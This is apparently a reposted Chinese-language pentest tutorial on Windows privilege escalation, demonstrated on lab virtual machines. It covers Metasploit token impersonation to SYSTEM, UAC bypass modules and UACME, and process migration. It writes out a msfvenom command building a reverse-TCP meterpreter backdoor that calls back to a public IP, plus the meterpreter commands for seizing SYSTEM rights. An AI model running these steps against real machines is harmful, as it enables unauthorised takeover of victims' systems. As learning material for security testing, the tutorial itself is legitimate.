WIN行程注入&BypassUAC&令牌竊取
本地提權—win令牌竊取
假冒令牌可以假冒一個網路中的另一個用戶進行各類操作,
所以當一個攻擊者需要域管理員的操作權限時候,需通過假冒域管理員的令牌進行攻擊,
我這里用到了windowns2008虛擬機做演示
先用msf生成一個后門
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe
msf上線
use incognito 匯入模塊
list_tokens -u 列出行程
impersonate_token "NT AUTHORITY\SYSTEM" 令牌竊取
獲得system權限
BypassUAC繞過提權
什么是UAC?如何設定?
UAC(UserAccount Control,用戶賬戶控制)
簡言之就是在Vista及更高版本中通過彈框進一步讓用戶
確認是否授權當前可執行檔案來達到阻止惡意程式的目的,
可以通過命令msconfig啟動管理器,更改UAC設定等級(默認等級)
參考:http://cn-sec.com/archives/116488.html
BypassUAC提權?常見繞過專案?
為了遠程執行目標的exe或者bat可執行檔案繞過此安全機制,以此叫BypassUAC
繞過專案:MSF內置,Powershell滲透框架,UACME專案(推薦)
https://github.com/hfiref0x/UACME
在msf自帶的提權getsystem中,如果遇到UAC,則不會成功,
win7演示:
使用msf自帶模塊繞過uac
use exploit/windows/local/bypassuac
getsystem 獲得最高權限
另外我用了Win7 虛擬機進行 本地提權
我使用了這個模塊:use exploit/windows/local/ask
但是該模塊實際上只是以高權限重啟一個回傳式shellcode,并沒有繞過UAC,會觸發系統UAC,受害機器有提示,提示用戶是否要運行,如果用戶選擇“yes”,就可以程式回傳一個高權限meterpreter shell,相當于釣魚攻擊,
當用戶點擊”是“后getsystem,
獲得最高權限,
行程注入
我用了win2008虛擬機做了演示
ps命令查看行程
migrate PID 遷移對應PID
獲得最高權限
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/456196.html
標籤:其他